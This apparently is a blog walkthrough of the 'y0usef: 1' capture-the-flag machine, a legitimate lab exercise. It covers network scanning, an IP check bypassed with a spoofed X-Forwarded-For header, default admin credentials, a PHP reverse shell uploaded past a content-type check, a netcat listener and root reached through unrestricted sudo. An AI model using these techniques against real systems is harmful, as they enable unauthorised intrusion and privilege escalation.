y0usef: 1 Walkthrough

3 min readDec 27, 2020

--

Description

Get two flag

Difficulty : easy

This works better with VirtualBox rather than VMware

Network Scanning

We always start with network scanning, Let’s find the target IP address by running netdiscover.

$ sudo netdiscover -i vboxnet0 -r 10.10.10.1/16

As we saw in netdiscover result. Our target ip address is 10.10.10.24.

Our next step is scanning the target machine. let’s start with nmap.

$ nmap -p- -sV 10.10.10.24

Enumeration

Firstly, moving towards port 80.

On manual enumeration, i couldn’t find any way in.

i also tried dirb and nikto but here also i couldn’t find any way.

Now i Had to login as guest to the box know what is actually happening.

guest-YN6JxL@yousef-VirtualBox:/$ cd /var/www/html/

There is a directory adminstration/

Let’s visit this directory.

http://10.10.10.24/adminstration

This was an another stuck point…haha..!!! But probably not….

We are going to enumerate adminstration directory .

guest-YN6JxL@yousef-VirtualBox:/$ cat /var/www/html/adminstration/index.php

$allowedIps = [‘127.0.0.1’];
$userIp = isset($_SERVER[‘HTTP_X_FORWARDED_FOR’]);

Okay, now we have to change header, here i am using a add-ons named “SIMPLE MODIFY HEADERS”

yes..!!! this worked.

Login with admin:admin, That’s quite simple.

Getting Reverse Shell..!!!!

And finally we can upload our reverse shell. But we cannot upload .php file, so here we’ll use Burp Suite to intercept and change content type to image/jpg.

Our reverse shell has been uploaded,

Hit the url to call our shell.

http://10.10.10.24/adminstration/upload/files/1609071720rs.php.

and turn on the listener.

$ nc -nlvp 1234

$ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

www-data@yousef-VirtualBox:/home$ cat user.txt
cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

user.txt is encoded in base64, let’s decode this.

$ echo “c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=” | base64 -d

Now we have username and password of ssh.

logging in to ssh with yousef:yousef123

$ ssh yousef@10.10.10.24

Way to root…!!!!

$ sudo -l

Matching Defaults entries for yousef on yousef-VirtualBox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User yousef may run the following commands on yousef-VirtualBox:
(ALL : ALL) ALL

$ sudo su

root@yousef-VirtualBox:/home/yousef# cat /root/root.txt

WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx

That’s it..!! Thanks for reading. Stay tuned for similar walkthrough and much more than this.

:- Dark-0

Dark-0

Written by Dark-0

Learning stuffs in Cybersecurity, Preparing for OSCP certification. #penetration_tester, CTF Player, Bug Hunter. https://twitter.com/dark0sombre

Help
Status
About
Careers
Blog
Privacy
Terms
Text to speech
Teams